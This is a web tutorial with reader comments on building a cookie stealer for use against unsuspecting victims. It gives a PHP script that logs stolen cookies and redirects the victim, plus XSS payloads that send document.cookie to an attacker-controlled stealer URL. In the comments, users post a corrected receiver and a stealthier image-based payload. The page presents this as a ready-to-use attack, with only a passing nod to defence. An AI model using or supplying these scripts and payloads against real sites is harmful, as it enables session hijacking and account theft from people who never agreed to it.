Cookie Stealer

How to build a basic Cookie Stealer.

A cookie stealer is used to steal the SESSION data or cookie information such as login details of any unsuspecting victim. Once the link is visited, the cookie data of the user is taken and stored externally. They are then redirected to another page without knowing what has just happened. This cookie stealer will be made using PHP so a webhost supporting PHP will be needed.

A cookie stealer is made up of a sender and a receiver. The sender is done using JavaScript so will work on almost any user providing JavaScript is turned on. The receiver is placed on your site and takes the cookie from the JavaScript cookie sender.

Here is a sample receiver code for your PHP file:


<?php 
$logFile = "cookieLog.txt"; 
$cookie = $_REQUEST["c"];

$handle = fopen($logFile, "a"); 
fwrite($handle, $cookie . "\n\n"); 
fclose($handle);

header("Location: http://www.google.com/"); 
exit; 
?>

The code above takes a REQUEST parameter of c from either a HTTP POST or as a GET parameter from the URL
(/script.php?c=[Cookie Data]). The details are stored in a text log file although a database could also be used. Finally after logging the cookie data the script redirects the victim back to an external URL.

Next is the JavaScript sender:

Again change the URL to fit the actual location and name of your PHP script.

If the code above is successfully injected into a page (e.g. through XSS) then as soon as the victim loads the page they will be redirected to your cookie stealer script. You could also load the URL into an iframe to avoid the redirection being noticed.

That's all there is to it, you have now built a successful cookie stealer.

How Cookie Stealers Are Successfully Used

The most common method of sucessfully embedding a cookie stealer into a webpage is either through an unfitered form such as a comment form or Guestbook that allows HTML to be injected into the page or through temporary or permanent XSS.

For more information on XSS, please read the XSS tutorial.

Using a similar example of a vulnerable search page where the URL is in the fotmat:

/search.php?q=search+term

A temporary XSS link could be:

/search.php?q=<script>window.location = "http://www.yourdomain.com/stealer.php?c=" + document.cookie;</script>

For better ways to obfuscate the link please read the XSS tutorial linked to above.

And that concludes this tutorial. Hopefully now you should be able to make a successful cookie stealer and avoid being a victim yourself.

Comments

t0mmy9

very quickly made tutorial, hope its helpful

sam207

Hey thanks its nice..

Guest

not working :(

tigerlazy002

it doesn't work.

cookie value is not sent to cookielog.txt.

Guest

Nice Brother

evilgoogle

Script that works:

<?php

$cookie = $_GET['c'];

$file = fopen('cookielog.txt', 'w');

fwrite($file, $cookie . "\n\n");

echo " <script>location.href='http://www.google.com';</script>";

?>

evilgoogle

(change the 'a' to a 'w')

AnMous

Your code will work because you are using the line $cookie = $_GET['c']; that is where the error was. 'a' makes it append rather than write over... which is better as you can steal multiple cookies that way. Apart from that error good tutorial though

sleepprogger

No clue if this site is stil active, but it is way less suspicous if the part leading the user to your logger is an image.

For the temp. xss example:

Search.php?q=<script>a = Image(); a.src="http://www.yoursite.com/stealer.php?c=" + document.cookie;

a.width = 0;

</script>

BTW: the captcha system here is ridicolous ;)

educatedPuto

i did not tried this, but maybe is not working because $HTTP_GET_VARS is depricated

http://php.net/manual/en/reserved.variables.get.php

educatedPuto

i did not tried this, but maybe is not working because $HTTP_GET_VARS is depricated

http://php.net/manual/en/reserved.variables.get.php